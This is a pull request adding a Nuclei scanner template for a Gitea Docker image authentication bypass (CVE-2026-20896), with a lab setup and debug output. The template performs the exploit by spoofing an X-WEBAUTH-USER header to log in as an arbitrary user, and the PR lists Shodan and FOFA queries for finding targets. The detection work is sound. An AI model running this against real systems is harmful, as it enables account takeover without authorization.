### PR TITLE
CVE-2026-20896 - Gitea - Reverse Proxy Authentication Bypass

### DIFF
--- a/http/cves/2026/CVE-2026-20896.yaml
+++ b/http/cves/2026/CVE-2026-20896.yaml
@@ -1,0 +1,75 @@
+id: CVE-2026-20896
+
+info:
+  name: Gitea <= 1.26.2 Docker Image - Reverse Proxy Authentication Bypass
+  author: aryu-ru,rz1027
+  severity: critical
+  description: |
+    The official Gitea Docker image up to and including 1.26.2 ships REVERSE_PROXY_TRUSTED_PROXIES = * in its bundled app.ini template. When reverse-proxy authentication is enabled, the wildcard causes every source IP to be treated as a trusted proxy, so an unauthenticated attacker who can reach the port directly can spoof the X-WEBAUTH-USER header and be authenticated as any user. With auto-registration enabled the impersonated account is created on the fly, allowing full takeover of an administrator account without a password or token.
+  impact: |
+    An unauthenticated remote attacker can impersonate any user, including administrators, obtaining full web-session access without any credentials.
+  remediation: |
+    Upgrade to Gitea 1.26.3 / 1.26.4 or later. As a workaround set REVERSE_PROXY_TRUSTED_PROXIES to the proxy's real IP/CIDR (never *), or disable ENABLE_REVERSE_PROXY_AUTHENTICATION if reverse-proxy login is not used.
+  reference:
+    - https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
+    - https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
+    - https://github.com/rz1027/CVE-2026-20896
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-20896
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-20896
+    epss-score: 0.00783
+    epss-percentile: 0.51761
+    cwe-id: CWE-284
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: gitea
+    product: gitea
+    shodan-query: http.html:"Gitea"
+    fofa-query: app="Gitea"
+  tags: cve,cve2026,gitea,auth-bypass,unauth
+
+variables:
+  username: "{{rand_text_alpha(8)}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET /user/settings HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 303'
+          - 'contains(header, "/user/login")'
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        GET /user/settings HTTP/1.1
+        Host: {{Hostname}}
+        X-WEBAUTH-USER: {{username}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Signed in as <strong>{{username}}</strong>"
+
+      - type: word
+        part: body
+        words:
+          - "Powered by Gitea"
+          - 'content="Gitea'
+        condition: or
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2026-20896 — Gitea <= 1.26.2 Docker image Reverse Proxy Authentication Bypass. The official `gitea/gitea` image (<= 1.26.2) ships `REVERSE_PROXY_TRUSTED_PROXIES = *` in its bundled `app.ini`. With reverse-proxy authentication enabled, that wildcard trusts every source IP, so an unauthenticated attacker who can reach the port directly can spoof the `X-WEBAUTH-USER` header and be logged in as any user (admin included). Fixed in 1.26.3/1.26.4, which drop the permissive default from the image (go-gitea/gitea#38151).
- References:
  - https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  - https://nvd.nist.gov/vuln/detail/CVE-2026-20896
  - https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  - https://github.com/rz1027/CVE-2026-20896 (PoC / reporter)

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details

Detection is exploitation-proof, not version-based: the template injects a random `X-WEBAUTH-USER` username and only matches if that exact username is reflected back inside Gitea's authenticated navbar (`Signed in as <strong>{{username}}</strong>`) with HTTP 200 — proving the spoofed header actually authenticated a session. Step 1 first confirms `/user/settings` redirects to login when no header is sent (303), so the flow demonstrates the header alone changed the auth state.

**Vulnerable lab (True Positive):** official image, reverse-proxy auth enabled, wildcard trusted-proxies inherited from the image default.

```yaml
# docker-compose.yml
services:
  gitea:
    image: gitea/gitea:1.26.2
    environment:
      - GITEA__security__INSTALL_LOCK=true
      - GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true
      - GITEA__service__ENABLE_REVERSE_PROXY_AUTO_REGISTRATION=true
    ports: ["3000:3000"]
```

`nuclei -debug` against the vulnerable instance:

```
[CVE-2026-20896] Dumped HTTP request  -> GET /user/settings           => HTTP/1.1 303 See Other
                                          Location: /user/login?redirect_to=%2Fuser%2Fsettings
[CVE-2026-20896] Dumped HTTP request  -> GET /user/settings
                                          X-WEBAUTH-USER: RuCNwknG     => HTTP/1.1 200 OK
                                          body: Signed in as <strong>RuCNwknG</strong>
[CVE-2026-20896] [http] [critical] http://<redacted>:3000/user/settings
```

**False-positive checks (no match):**
- Normal Gitea (same image, reverse-proxy auth **off** — the default state) → no match.
- Honeypot `http://honey.scanme.sh` → no match.

Shodan: `http.html:"Gitea"` · FOFA: `app="Gitea"`

Classification: CVSS:3.1 9.8 (Critical) `AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`, CWE-284.

**Reviewer note:** on instances with auto-registration enabled, the probe causes Gitea to auto-create one throwaway account named after the random `X-WEBAUTH-USER` value (an admin can delete it); this is inherent to proving the fully-unauthenticated takeover condition and is non-destructive.
